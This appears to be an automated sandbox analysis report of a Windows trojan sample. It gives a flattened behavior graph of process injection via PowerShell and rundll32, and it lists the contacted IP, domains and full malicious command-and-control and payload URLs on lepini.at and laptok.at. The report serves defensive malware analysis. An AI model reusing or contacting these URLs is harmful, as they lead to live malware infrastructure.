behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 351337 Sample: SecuriteInfo.com.Trojan.Win... Startdate: 10/02/2021 Architecture: WINDOWS Score: 100 33 c56.lepini.at 2->33 35 resolver1.opendns.com 2->35 37 api3.lepini.at 2->37 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 8 other signatures 2->55 7 mshta.exe 19 2->7         started        10 loaddll32.exe 1 2->10         started        12 iexplore.exe 2 56 2->12         started        14 SpeechRuntime.exe 33 2->14         started        signatures3 process4 signatures5 57 Suspicious powershell command line found 7->57 16 powershell.exe 2 31 7->16         started        59 Writes or reads registry keys via WMI 10->59 61 Writes registry values via WMI 10->61 20 rundll32.exe 10->20         started        22 rundll32.exe 10->22         started        24 iexplore.exe 30 12->24         started        27 iexplore.exe 30 12->27         started        29 iexplore.exe 30 12->29         started        process6 dnsIp7 31 C:\Users\user\AppData\Local\...\qidcr3ig.0.cs, UTF-8 16->31 dropped 41 Modifies the context of a thread in another process (thread injection) 16->41 43 Maps a DLL or memory area into another process 16->43 45 Compiles code for process injection (via .Net compiler) 16->45 47 Creates a thread in another existing process (thread injection) 16->47 39 api10.laptok.at 35.228.31.40, 49755, 49756, 49758 GOOGLEUS United States 24->39 file8 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
35.228.31.40
 unknown United States
15169 GOOGLEUS true

Contacted Domains

Name IP Active
c56.lepini.at 35.228.31.40 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 35.228.31.40 true
api10.laptok.at 35.228.31.40 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api3.lepini.at/api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 false
  • Avira URL Cloud: safe
 unknown
http://api3.lepini.at/api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE false
  • Avira URL Cloud: safe
 unknown
http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU false
  • Avira URL Cloud: safe
 unknown
http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s false
  • Avira URL Cloud: safe
 unknown
http://c56.lepini.at/jvassets/xI/t64.dat true
  • Avira URL Cloud: phishing
 unknown
http://api3.lepini.at/api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q false
  • Avira URL Cloud: safe
 unknown
http://api10.laptok.at/favicon.ico false
  • Avira URL Cloud: safe
 unknown